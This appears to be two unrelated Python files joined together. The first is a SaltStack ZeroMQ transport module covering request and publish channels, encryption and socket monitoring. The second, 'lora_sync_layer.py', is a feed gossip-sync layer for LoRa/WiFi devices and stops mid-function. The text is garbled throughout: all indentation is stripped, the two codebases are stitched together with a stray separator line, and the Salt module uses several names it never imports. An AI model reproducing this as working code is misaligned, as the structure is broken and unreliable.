from salt.exceptions import SaltReqTimeoutError
import zmq
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
import zmq.eventloop.zmqstream
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# Import Tornado Libs
import tornado
import tornado.gen
import tornado.concurrent
# Import third party libs
import salt.ext.six as six
from Crypto.Cipher import PKCS1_OAEP
log = logging.getLogger(__name__)
class AsyncZeroMQReqChannel(salt.transport.client.ReqChannel):
'''
Encapsulate sending routines to ZeroMQ.
ZMQ Channels default to 'crypt=aes'
'''
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
def __new__(cls, opts, **kwargs):
'''
Only create one instance of channel per __key()
'''
# do we have any mapping for this io_loop
io_loop = kwargs.get('io_loop')
if io_loop is None:
zmq.eventloop.ioloop.install()
io_loop = tornado.ioloop.IOLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
if key not in loop_instance_map:
log.debug('Initializing new AsyncZeroMQReqChannel for {0}'.format(key))
# we need to make a local variable for this, as we are going to store
# it in a WeakValueDictionary-- which will remove the item if no one
# references it-- this forces a reference while we return to the caller
new_obj = object.__new__(cls)
new_obj.__singleton_init__(opts, **kwargs)
loop_instance_map[key] = new_obj
else:
log.debug('Re-using AsyncZeroMQReqChannel for {0}'.format(key))
try:
return loop_instance_map[key]
except KeyError:
# In iterating over the loop_instance_map, we may have triggered
# garbage collection. Therefore, the key is no longer present in
# the map. Re-gen and add to map.
log.debug('Initializing new AsyncZeroMQReqChannel due to GC for {0}'.format(key))
new_obj = object.__new__(cls)
new_obj.__singleton_init__(opts, **kwargs)
loop_instance_map[key] = new_obj
return loop_instance_map[key]
@classmethod
def __key(cls, opts, **kwargs):
return (opts['pki_dir'], # where the keys are stored
opts['id'], # minion ID
kwargs.get('master_uri', opts.get('master_uri')), # master ID
kwargs.get('crypt', 'aes'), # TODO: use the same channel for crypt
)
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.ttype = 'zeromq'
# crypt defaults to 'aes'
self.crypt = kwargs.get('crypt', 'aes')
if 'master_uri' in kwargs:
self.opts['master_uri'] = kwargs['master_uri']
self._io_loop = kwargs.get('io_loop')
if self._io_loop is None:
zmq.eventloop.ioloop.install()
self._io_loop = tornado.ioloop.IOLoop.current()
if self.crypt != 'clear':
            # we don't need to worry about auth as a kwarg, since it's a singleton
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self._io_loop)
self.message_client = AsyncReqMessageClient(self.opts,
self.master_uri,
io_loop=self._io_loop,
)
def __del__(self):
'''
Since the message_client creates sockets and assigns them to the IOLoop we have to
specifically destroy them, since we aren't the only ones with references to the FDs
'''
if hasattr(self, 'message_client'):
self.message_client.destroy()
else:
log.debug('No message_client attr for AsyncZeroMQReqChannel found. Not destroying sockets.')
@property
def master_uri(self):
return self.opts['master_uri']
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@tornado.gen.coroutine
def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):
if not self.auth.authenticated:
            # Return control back to the caller; continue when authentication succeeds
yield self.auth.authenticate()
# Return control to the caller. When send() completes, resume by populating ret with the Future.result
ret = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout)
key = self.auth.get_keys()
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret['key'])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
raise tornado.gen.Return(pcrypt.loads(ret[dictkey]))
@tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60):
'''
Send a load across the wire, with encryption
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
:param dict load: A load to send across the wire
        :param int tries: The number of attempts to make before failing
        :param int timeout: The number of seconds to wait for a response before failing
'''
@tornado.gen.coroutine
def _do_transfer():
# Yield control to the caller. When send() completes, resume by populating data with the Future.result
data = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
)
            # We may not always get data back; for example, a salt-call ret
            # submission is a blind communication where we do not subscribe to
            # return events, we just upload the results to the master
if data:
data = self.auth.crypticle.loads(data)
raise tornado.gen.Return(data)
if not self.auth.authenticated:
# Return control back to the caller, resume when authentication succeeds
yield self.auth.authenticate()
try:
            # Attempt the transfer; on an authentication error below, re-authenticate and retry once.
ret = yield _do_transfer()
except salt.crypt.AuthenticationError:
# If auth error, return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
'''
Send a load across the wire in cleartext
:param dict load: A load to send across the wire
        :param int tries: The number of attempts to make before failing
        :param int timeout: The number of seconds to wait for a response before failing
'''
ret = yield self.message_client.send(self._package_load(load), timeout=timeout)
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def send(self, load, tries=3, timeout=60):
'''
Send a request, return a future which will complete when we send the message
'''
if self.crypt == 'clear':
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout)
raise tornado.gen.Return(ret)
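def _sketch_per_loop_singleton():
    '''
    A hedged, minimal sketch (not Salt code) of the caching pattern used by
    AsyncZeroMQReqChannel.__new__ above: one instance per (io_loop, key), held
    in weak mappings so entries vanish once nothing else references them.
    Callers must therefore keep a strong reference to the returned object.
    '''
    import weakref
    instance_map = weakref.WeakKeyDictionary()
    class Channel(object):
        pass
    def get_channel(io_loop, key):
        per_loop = instance_map.setdefault(io_loop, weakref.WeakValueDictionary())
        channel = per_loop.get(key)
        if channel is None:
            channel = Channel()
            per_loop[key] = channel
        return channel
    return get_channel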
class AsyncZeroMQPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel):
'''
A transport channel backed by ZeroMQ for a Salt Publisher to use to
publish commands to connected minions
'''
def __init__(self,
opts,
**kwargs):
self.opts = opts
self.ttype = 'zeromq'
self.io_loop = kwargs.get('io_loop')
if self.io_loop is None:
zmq.eventloop.ioloop.install()
self.io_loop = tornado.ioloop.IOLoop.current()
self.hexid = hashlib.sha1(six.b(self.opts['id'])).hexdigest()
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
self._socket = self.context.socket(zmq.SUB)
if self.opts['zmq_filtering']:
# TODO: constants file for "broadcast"
self._socket.setsockopt(zmq.SUBSCRIBE, 'broadcast')
self._socket.setsockopt(zmq.SUBSCRIBE, self.hexid)
else:
self._socket.setsockopt(zmq.SUBSCRIBE, '')
self._socket.setsockopt(zmq.IDENTITY, self.opts['id'])
# TODO: cleanup all the socket opts stuff
if hasattr(zmq, 'TCP_KEEPALIVE'):
self._socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
recon_delay = self.opts['recon_default']
if self.opts['recon_randomize']:
recon_delay = randint(self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max']
)
log.debug("Generated random reconnect delay between '{0}ms' and '{1}ms' ({2})".format(
self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'],
recon_delay)
)
log.debug("Setting zmq_reconnect_ivl to '{0}ms'".format(recon_delay))
self._socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
log.debug("Setting zmq_reconnect_ivl_max to '{0}ms'".format(
self.opts['recon_default'] + self.opts['recon_max'])
)
self._socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self._socket.setsockopt(zmq.IPV4ONLY, 0)
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
self._monitor = ZeroMQSocketMonitor(self._socket)
self._monitor.start_io_loop(self.io_loop)
def destroy(self):
if hasattr(self, '_monitor') and self._monitor is not None:
self._monitor.stop()
self._monitor = None
if hasattr(self, '_stream'):
# TODO: Optionally call stream.close() on newer pyzmq? Its broken on some
self._stream.io_loop.remove_handler(self._stream.socket)
self._stream.socket.close(0)
if hasattr(self, 'context'):
self.context.term()
def __del__(self):
self.destroy()
# TODO: this is the time to see if we are connected, maybe use the req channel to guess?
@tornado.gen.coroutine
def connect(self):
if not self.auth.authenticated:
yield self.auth.authenticate()
self.publish_port = self.auth.creds['publish_port']
self._socket.connect(self.master_pub)
@property
def master_pub(self):
'''
Return the master publish port
'''
return 'tcp://{ip}:{port}'.format(ip=self.opts['master_ip'],
port=self.publish_port)
@tornado.gen.coroutine
def _decode_messages(self, messages):
'''
Take the zmq messages, decrypt/decode them into a payload
:param list messages: A list of messages to be decoded
'''
messages_len = len(messages)
# if it was one message, then its old style
if messages_len == 1:
payload = self.serial.loads(messages[0])
# 2 includes a header which says who should do it
elif messages_len == 2:
payload = self.serial.loads(messages[1])
else:
            raise Exception(('Invalid number of messages ({0}) in zeromq pub '
                             'message from master').format(messages_len))
# Yield control back to the caller. When the payload has been decoded, assign
# the decoded payload to 'ret' and resume operation
ret = yield self._decode_payload(payload)
raise tornado.gen.Return(ret)
@property
def stream(self):
'''
Return the current zmqstream, creating one if necessary
'''
if not hasattr(self, '_stream'):
self._stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
return self._stream
def on_recv(self, callback):
'''
        Register a callback for received messages (that we didn't initiate)
:param func callback: A function which should be called when data is received
'''
if callback is None:
return self.stream.on_recv(None)
@tornado.gen.coroutine
def wrap_callback(messages):
payload = yield self._decode_messages(messages)
callback(payload)
return self.stream.on_recv(wrap_callback)
class ZeroMQReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel):
def zmq_device(self):
'''
Multiprocessing target for the zmq queue device
'''
salt.utils.appendproctitle('MWorkerQueue')
self.context = zmq.Context(self.opts['worker_threads'])
# Prepare the zeromq sockets
self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts)
self.clients = self.context.socket(zmq.ROUTER)
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.clients.setsockopt(zmq.IPV4ONLY, 0)
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
            # The socket monitor should only be used for debugging, so using threading here is acceptable
import threading
self._monitor = ZeroMQSocketMonitor(self.clients)
t = threading.Thread(target=self._monitor.start_poll)
t.start()
self.workers = self.context.socket(zmq.DEALER)
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Setting up the master communication server')
self.clients.bind(self.uri)
self.workers.bind(self.w_uri)
while True:
try:
zmq.device(zmq.QUEUE, self.clients, self.workers)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
def close(self):
'''
Cleanly shutdown the router socket
'''
if hasattr(self, '_monitor') and self._monitor is not None:
self._monitor.stop()
self._monitor = None
        if hasattr(self, 'clients'):
            self.clients.close()
        if hasattr(self, 'stream'):
            self.stream.close()
def pre_fork(self, process_manager):
'''
Pre-fork we need to create the zmq router device
:param func process_manager: An instance of salt.utils.process.ProcessManager
'''
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
process_manager.add_process(self.zmq_device)
def post_fork(self, payload_handler, io_loop):
'''
After forking we need to create all of the local sockets to listen to the
router
        :param func payload_handler: A function to be called to handle incoming payloads as
they are picked up off the wire
:param IOLoop io_loop: An instance of a Tornado IOLoop, to handle event scheduling
'''
self.payload_handler = payload_handler
self.io_loop = io_loop
self.context = zmq.Context(1)
self._socket = self.context.socket(zmq.REP)
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Worker binding to socket {0}'.format(self.w_uri))
self._socket.connect(self.w_uri)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
self.stream.on_recv_stream(self.handle_message)
@tornado.gen.coroutine
def handle_message(self, stream, payload):
'''
        Handle incoming messages from the underlying ZeroMQ streams
        :param ZMQStream stream: A ZeroMQ stream.
See http://zeromq.github.io/pyzmq/api/generated/zmq.eventloop.zmqstream.html
:param dict payload: A payload to process
'''
try:
payload = self.serial.loads(payload[0])
payload = self._decode_payload(payload)
        except Exception as exc:
            log.error('Bad load from minion: %s: %s', type(exc).__name__, exc)
            stream.send(self.serial.dumps('bad load'))
raise tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict):
log.error('payload and load must be a dict. Payload was: {0} and load was {1}'.format(payload, payload.get('load')))
stream.send(self.serial.dumps('payload and load must be a dict'))
raise tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth':
stream.send(self.serial.dumps(self._auth(payload['load'])))
raise tornado.gen.Return()
# TODO: test
try:
# Take the payload_handler function that was registered when we created the channel
# and call it, returning control to the caller until it completes
ret, req_opts = yield self.payload_handler(payload)
except Exception as e:
# always attempt to return an error to the minion
stream.send('Some exception handling minion payload')
log.error('Some exception handling a payload from minion', exc_info=True)
raise tornado.gen.Return()
req_fun = req_opts.get('fun', 'send')
if req_fun == 'send_clear':
stream.send(self.serial.dumps(ret))
elif req_fun == 'send':
stream.send(self.serial.dumps(self.crypticle.dumps(ret)))
elif req_fun == 'send_private':
stream.send(self.serial.dumps(self._encrypt_private(ret,
req_opts['key'],
req_opts['tgt'],
)))
else:
log.error('Unknown req_fun {0}'.format(req_fun))
# always attempt to return an error to the minion
stream.send('Server-side exception handling payload')
raise tornado.gen.Return()
class ZeroMQPubServerChannel(salt.transport.server.PubServerChannel):
'''
Encapsulate synchronous operations for a publisher channel
'''
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
def connect(self):
return tornado.gen.sleep(5)
def _publish_daemon(self):
'''
Bind to the interface specified in the configuration file
'''
salt.utils.appendproctitle(self.__class__.__name__)
# Set up the context
context = zmq.Context(1)
# Prepare minion publish socket
pub_sock = context.socket(zmq.PUB)
        # with zmq >= 2.1 and < 3.0, there is only one HWM setting
try:
pub_sock.setsockopt(zmq.HWM, self.opts.get('pub_hwm', 1000))
# in zmq >= 3.0, there are separate send and receive HWM settings
except AttributeError:
# Set the High Water Marks. For more information on HWM, see:
# http://api.zeromq.org/4-1:zmq-setsockopt
pub_sock.setsockopt(zmq.SNDHWM, self.opts.get('pub_hwm', 1000))
pub_sock.setsockopt(zmq.RCVHWM, self.opts.get('pub_hwm', 1000))
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
pub_sock.setsockopt(zmq.IPV4ONLY, 0)
pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts)
# Prepare minion pull socket
pull_sock = context.socket(zmq.PULL)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
salt.utils.zeromq.check_ipc_path_max_len(pull_uri)
# Start the minion command publisher
log.info('Starting the Salt Publisher on {0}'.format(pub_uri))
pub_sock.bind(pub_uri)
# Securely create socket
log.info('Starting the Salt Puller on {0}'.format(pull_uri))
old_umask = os.umask(0o177)
try:
pull_sock.bind(pull_uri)
finally:
os.umask(old_umask)
try:
while True:
# Catch and handle EINTR from when this process is sent
# SIGUSR1 gracefully so we don't choke and die horribly
try:
package = pull_sock.recv()
unpacked_package = salt.payload.unpackage(package)
payload = unpacked_package['payload']
if self.opts['zmq_filtering']:
# if you have a specific topic list, use that
if 'topic_lst' in unpacked_package:
for topic in unpacked_package['topic_lst']:
# zmq filters are substring match, hash the topic
# to avoid collisions
htopic = hashlib.sha1(topic).hexdigest()
pub_sock.send(htopic, flags=zmq.SNDMORE)
pub_sock.send(payload)
                        # otherwise it's a broadcast
else:
# TODO: constants file for "broadcast"
pub_sock.send('broadcast', flags=zmq.SNDMORE)
pub_sock.send(payload)
else:
pub_sock.send(payload)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
except KeyboardInterrupt:
# Cleanly close the sockets if we're shutting down
if pub_sock.closed is False:
pub_sock.setsockopt(zmq.LINGER, 1)
pub_sock.close()
if pull_sock.closed is False:
pull_sock.setsockopt(zmq.LINGER, 1)
pull_sock.close()
if context.closed is False:
context.term()
def pre_fork(self, process_manager):
'''
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
:param func process_manager: A ProcessManager, from salt.utils.process.ProcessManager
'''
process_manager.add_process(self._publish_daemon)
def publish(self, load):
'''
Publish "load" to minions
:param dict load: A load to be sent across the wire to minions
'''
payload = {'enc': 'aes'}
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
payload['load'] = crypticle.dumps(load)
if self.opts['sign_pub_messages']:
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
log.debug("Signing data packet")
payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load'])
# Send 0MQ to the publisher
context = zmq.Context(1)
pub_sock = context.socket(zmq.PUSH)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
pub_sock.connect(pull_uri)
int_payload = {'payload': self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load['tgt_type'] == 'list':
int_payload['topic_lst'] = load['tgt']
pub_sock.send(self.serial.dumps(int_payload))
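# Minimal sketch (illustrative only, not part of Salt): the subscriber side of the
# zmq_filtering scheme used by ZeroMQPubServerChannel._publish_daemon above. The
# publisher prefixes each targeted publish with the SHA1 hex digest of the topic,
# so a subscriber would need to subscribe to that same digest (plus 'broadcast')
# to receive its messages. The 'minion_id' value below is a hypothetical example.
def _example_filtered_subscribe(sub_socket, minion_id='minion-1'):
    import hashlib
    import zmq
    # Subscribe to messages targeted at this minion id (hashed like the publisher does)...
    hashed = hashlib.sha1(minion_id.encode()).hexdigest().encode()
    sub_socket.setsockopt(zmq.SUBSCRIBE, hashed)
    # ...and to untargeted broadcasts.
    sub_socket.setsockopt(zmq.SUBSCRIBE, b'broadcast')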
# TODO: unit tests!
class AsyncReqMessageClient(object):
'''
    This class wraps the underlying zeromq REQ socket and gives a future-based
    interface to sending and receiving messages. This works around the primary
    limitation of serialized send/recv on the underlying socket by queueing the
    message sends in this class. In the future, if we decide to attempt to multiplex,
    we can manage a pool of REQ/REP sockets -- but for now we'll just do them serially
'''
def __init__(self, opts, addr, linger=0, io_loop=None):
'''
Create an asynchronous message client
:param dict opts: The salt opts dictionary
        :param str addr: The master address this REQ socket connects to
:param int linger: The number of seconds to linger on a ZMQ socket. See
http://api.zeromq.org/2-1:zmq-setsockopt [ZMQ_LINGER]
:param IOLoop io_loop: A Tornado IOLoop event scheduler [tornado.ioloop.IOLoop]
'''
self.opts = opts
self.addr = addr
self.linger = linger
        if io_loop is None:
            zmq.eventloop.ioloop.install()
            self.io_loop = tornado.ioloop.IOLoop.current()
        else:
            self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
# wire up sockets
self._init_socket()
self.send_queue = []
# mapping of message -> future
self.send_future_map = {}
self.send_timeout_map = {} # message -> timeout
# TODO: timeout all in-flight sessions, or error
def destroy(self):
if hasattr(self, 'stream') and self.stream is not None:
# TODO: Optionally call stream.close() on newer pyzmq? It is broken on some.
if self.stream.socket:
self.stream.socket.close()
self.stream.io_loop.remove_handler(self.stream.socket)
# set this to None, more hacks for messed up pyzmq
self.stream.socket = None
self.socket.close()
self.context.term()
def __del__(self):
self.destroy()
def _init_socket(self):
if hasattr(self, 'stream'):
self.stream.close() # pylint: disable=E0203
self.socket.close() # pylint: disable=E0203
del self.stream
del self.socket
self.socket = self.context.socket(zmq.REQ)
# socket options
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, 5000
)
self._set_tcp_keepalive()
if self.addr.startswith('tcp://['):
# Hint PF type if bracket enclosed IPv6 address
if hasattr(zmq, 'IPV6'):
self.socket.setsockopt(zmq.IPV6, 1)
elif hasattr(zmq, 'IPV4ONLY'):
self.socket.setsockopt(zmq.IPV4ONLY, 0)
self.socket.linger = self.linger
self.socket.connect(self.addr)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self.socket, io_loop=self.io_loop)
def _set_tcp_keepalive(self):
'''
        Ensure that TCP keepalives are set on the REQ socket.
Warning: Failure to set TCP keepalives can result in frequent or unexpected
disconnects!
'''
if hasattr(zmq, 'TCP_KEEPALIVE') and self.opts:
if 'tcp_keepalive' in self.opts:
self.socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
if 'tcp_keepalive_idle' in self.opts:
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
if 'tcp_keepalive_cnt' in self.opts:
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
if 'tcp_keepalive_intvl' in self.opts:
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
@tornado.gen.coroutine
def _internal_send_recv(self):
while len(self.send_queue) > 0:
message = self.send_queue.pop(0)
future = self.send_future_map.pop(message)
# send
def mark_future(msg):
if not future.done():
future.set_result(self.serial.loads(msg[0]))
self.stream.on_recv(mark_future)
self.stream.send(message)
try:
ret = yield future
except: # pylint: disable=W0702
self._init_socket() # re-init the zmq socket (no other way in zmq)
continue
self.remove_message_timeout(message)
def remove_message_timeout(self, message):
if message not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message)
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message):
'''
Handle a message timeout by removing it from the sending queue
        and informing the caller by setting a SaltReqTimeoutError on the
        message's pending future
'''
del self.send_timeout_map[message]
self.send_future_map.pop(message).set_exception(SaltReqTimeoutError('Message timed out'))
def send(self, message, timeout=None, callback=None):
'''
Return a future which will be completed when the message has a response
'''
message = self.serial.dumps(message)
future = tornado.concurrent.Future()
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message] = future
if timeout is not None:
send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message)
self.send_timeout_map[message] = send_timeout
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._internal_send_recv)
self.send_queue.append(message)
return future
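# Usage sketch (illustrative only, not part of Salt): AsyncReqMessageClient queues
# sends so that only one request is in flight on the REQ socket at a time; each
# call to send() returns a Future resolved with the decoded reply. The opts dict
# and master address below are hypothetical placeholders.
def _example_req_client(io_loop, opts, master_addr='tcp://127.0.0.1:4506'):
    client = AsyncReqMessageClient(opts, master_addr, io_loop=io_loop)
    # Both sends are queued; the second is not written to the socket until the
    # first reply has been received (or its timeout fires).
    first = client.send({'cmd': 'ping'}, timeout=60)
    second = client.send({'cmd': 'ping'}, timeout=60)
    return first, second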
class ZeroMQSocketMonitor(object):
__EVENT_MAP = None
def __init__(self, socket):
'''
Create ZMQ monitor sockets
More information:
http://api.zeromq.org/4-0:zmq-socket-monitor
'''
self._socket = socket
self._monitor_socket = self._socket.get_monitor_socket()
self._monitor_stream = None
def start_io_loop(self, io_loop):
log.trace("Event monitor start!")
self._monitor_stream = zmq.eventloop.zmqstream.ZMQStream(self._monitor_socket, io_loop=io_loop)
self._monitor_stream.on_recv(self.monitor_callback)
def start_poll(self):
log.trace("Event monitor start!")
while self._monitor_socket is not None and self._monitor_socket.poll():
msg = self._monitor_socket.recv_multipart()
self.monitor_callback(msg)
@property
def event_map(self):
if ZeroMQSocketMonitor.__EVENT_MAP is None:
event_map = {}
for name in dir(zmq):
if name.startswith('EVENT_'):
value = getattr(zmq, name)
event_map[value] = name
ZeroMQSocketMonitor.__EVENT_MAP = event_map
return ZeroMQSocketMonitor.__EVENT_MAP
def monitor_callback(self, msg):
evt = zmq.utils.monitor.parse_monitor_message(msg)
evt['description'] = self.event_map[evt['event']]
log.debug("ZeroMQ event: {0}".format(evt))
if evt['event'] == zmq.EVENT_MONITOR_STOPPED:
self.stop()
def stop(self):
if self._socket is None:
return
self._socket.disable_monitor()
self._socket = None
self._monitor_socket = None
if self._monitor_stream is not None:
self._monitor_stream.close()
self._monitor_stream = None
log.trace("Event monitor done!")
|
lora_sync_layer.py
|
from wifi_link_layer import Wifi_Link_Layer
from lora_feed_layer import Lora_Feed_Layer
import os
import math
import time
import _thread
import threading
import json
import crypto
import feed
import binascii
import event
import pcap
import sys
from struct import unpack
class Lora_Sync_Layer:
def __init__(self, feed_layer):
self.link_layer = Wifi_Link_Layer(self.receive_msg_cb)
self.feed_layer = feed_layer
#self.events_list = [[0, "Hallo1"], [1, "Hallo2"], [2, "Hallo3"], [3, "Hallo4"]]
#_thread.start_new_thread(self.send_gossip, ())
        self.verbose = 1  # print verbose debug output
self.gossip_wait = 8
a = threading.Thread(target=self.send_gossip)
a.start()
def receive_msg_cb(self, msg):
self.decode_msg(msg)
    def decode_msg(self, msg):
        # Frame layout: byte 0 = control (0 = gossip, 1 = event),
        # bytes 1-8 = feed id, bytes 9-10 = feed length (big endian),
        # remaining bytes = the wired event (event frames only).
        control_int = msg[0]
        fid = msg[1:9]
        #msg = str(msg, "utf-8")
        if (control_int == 0):
            print("Sync Layer | New gossip received")
            feed_len_int = msg[9] * 256 + msg[10]
            self.handle_incoming_gossip(feed_len_int, fid)
        elif (control_int == 1):
            print("Sync Layer | New event received")
            feed_len_int = msg[9] * 256 + msg[10]
            data = msg[11:]
            self.handle_incoming_event(feed_len_int, data, fid)
    def handle_incoming_gossip(self, peer_feed_len, fid):
        # The gossip carries the peer's current feed length; if our feed is
        # longer, send back the next event the peer is missing.
        print("Sync Layer | Handle incoming gossip")
        if (peer_feed_len < self.feed_layer.get_feed_length(fid)):
            print("Sync Layer | Sending event nr " + str(peer_feed_len))
            search = peer_feed_len + 1
            e_wired = self.feed_layer.get_wired_event(fid, search)
print("Sync Layer | Sending event: Length=" + str(len(e_wired)))
control_b = (1).to_bytes(1, 'big')
feed_len_b = search.to_bytes(2, 'big')
#wait random time before sending
random = int.from_bytes(os.urandom(1), "big")
gossip_waiting = self.gossip_wait + math.floor(random/256*5)
if self.verbose:
print('send_gossip waiting for '+ str(gossip_waiting))
time.sleep(gossip_waiting)
self.send_event(control_b + fid + feed_len_b + e_wired)
    def handle_incoming_event(self, seq, msg, fid):
print("Sync Layer | Event data: " + str(msg))
#if (incoming_event[0] == len(self.events_list)): #check if already appended
#self.events_list.append(incoming_event)
#print("Acquired event:" + str(incoming_event[0]))
#fid = self.feed_layer.get_sensor_feed_fid()
        self.feed_layer.append(fid, seq, msg)
print("Sync Layer | Feed length:" + str(self.feed_layer.get_feed_length(fid)))
        #If the data is needed right away, append it automatically;
        #otherwise, if it could be used later, store it in a buffer.
        #Check whether the data is useful and append it to the feed, or buffer it if an event in between is still missing.
def send_event(self, msg):
self.link_layer.append_msg_to_pipeline(msg, False)
        #Send events individually? How large can a single message be?
def send_gossip(self):
while True:
# get current feeds
[pcap_list,fid_list] = self.feed_layer.get_fid_list()
random = int.from_bytes(os.urandom(1), "big")
gossip_waiting = self.gossip_wait + math.floor(random/256*5)
for fi in fid_list:
if self.verbose:
print('send_gossip waiting for '+ str(gossip_waiting))
time.sleep(gossip_waiting)
control_b = (0).to_bytes(1, 'big')
feed_len = self.feed_layer.get_feed_length(fi)
feed_len_b = feed_len.to_bytes(2, 'big')
gossip = control_b + fi + feed_len_b
if self.verbose:
[name,type] = self.feed_layer.get_name(fi)
print("Sync Layer | Send gossip: 0 " + name + " " + str(feed_len))
# control_b = (0).to_bytes(1, 'big')
# fid = self.feed_layer.get_sensor_feed_fid()
# feed_len = self.feed_layer.get_feed_length(fid)
# feed_len_b = feed_len.to_bytes(2, 'big')
#
